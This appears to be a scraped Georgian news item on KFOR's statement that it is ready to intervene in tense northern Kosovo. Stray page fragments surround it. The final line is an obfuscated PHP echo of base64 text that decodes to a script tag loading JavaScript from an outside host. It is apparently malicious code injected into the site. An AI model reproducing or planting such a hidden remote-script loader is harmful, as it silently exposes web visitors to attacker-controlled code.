celsiusi
ავერსი შნაიდერი
NATO-ს ძალები (KFOR) კოსოვოში აცხადებენ, რომ სტაბილურობისთვის საფრთხის შემთხვევაში მზად არიან კონფლიქტში ჩაერიონ.
 
''საერთო უსაფრთხოების ვითარება კოსოვოს ჩრდილოეთ მუნიციპალიტეტებში დაძაბულია. NATO-ს ხელმძღვანელობით KFOR-ის მისია ყურადღებით აკვირდება და მზად არის ჩაერიოს სტაბილურობის საფრთხის შემთხვევაში, მისი მანდატის შესაბამისად, რომელიც გამომდინარეობს გაეროს უშიშროების საბჭოს 1999 წლის 1244 რეზოლუციიდან“, - ნათქვამია განცხადებაში.
 
ცნობისთვის, კოსოვო-სერბეთის საზღვარზე დაძაბულობაა. კოსოვოს შინაგან საქმეთა სამინისტროს ძალები სერბეთის საზღვართან გადაჰყავს. სერბეთის პრეზიდენტის მტკიცებით, კოსოვოს ჯარი ჩრდილოეთ სერბეთზე თავდასხმას აპირებს. 
488
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");